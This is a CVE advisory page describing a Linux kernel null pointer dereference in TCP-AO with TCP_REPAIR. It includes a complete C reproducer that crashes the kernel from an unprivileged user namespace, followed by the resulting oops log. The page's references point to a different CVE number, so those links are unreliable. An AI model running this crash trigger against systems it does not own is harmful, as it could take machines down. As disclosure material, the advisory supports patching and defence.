CVE-2025-39950
Description
In the Linux kernel, the following vulnerability has been resolved:net/tcp: Fix a null pointer dereference when using TCP-AO with TCP_REPAIRA null pointer dereference can occur in tcp_ao_finish_connect() during aconnect() system call on a socket with a TCP-AO key added and TCP_REPAIRenabled.The function is called with skb being null and attempts to dereference iton tcp_hdr(skb)->seq without a prior skb validation.Fix this by checking if skb is null before dereferencing it.The commentary is taken from bpf_skops_established(), which is also calledin the same flow. Unlike the function being patched,bpf_skops_established() validates the skb before dereferencing it.int main(void){struct sockaddr_in sockaddr;struct tcp_ao_add tcp_ao;int sk;int one = 1;memset(&sockaddr,0,sizeof(sockaddr));memset(&tcp_ao,0,sizeof(tcp_ao));sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);sockaddr.sin_family = AF_INET;memcpy(tcp_ao.alg_name,cmac(aes128),12);memcpy(tcp_ao.key,ABCDEFGHABCDEFGH,16);tcp_ao.keylen = 16;memcpy(&tcp_ao.addr,&sockaddr,sizeof(sockaddr));setsockopt(sk, IPPROTO_TCP, TCP_AO_ADD_KEY, &tcp_ao,sizeof(tcp_ao));setsockopt(sk, IPPROTO_TCP, TCP_REPAIR, &one, sizeof(one));sockaddr.sin_family = AF_INET;sockaddr.sin_port = htobe16(123);inet_aton(127.0.0.1, &sockaddr.sin_addr);connect(sk,(struct sockaddr *)&sockaddr,sizeof(sockaddr));return 0;}$ gcc tcp-ao-nullptr.c -o tcp-ao-nullptr -Wall$ unshare -UrnBUG: kernel null pointer dereference, address: 00000000000000b6PGD 1f648d067 P4D 1f648d067 PUD 1982e8067 PMD 0Oops: Oops: 0000 [#1] SMP NOPTIHardware name: VMware, Inc. VMware Virtual Platform/440BX DesktopReference Platform, BIOS 6.00 11/12/2020RIP: 0010:tcp_ao_finish_connect (net/ipv4/tcp_ao.c:1182)
Risk Information
Associated Vulnerability
No records foundPatch Details
No records foundReferences
https://nvd.nist.gov/vuln/detail/CVE-2023-1234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1234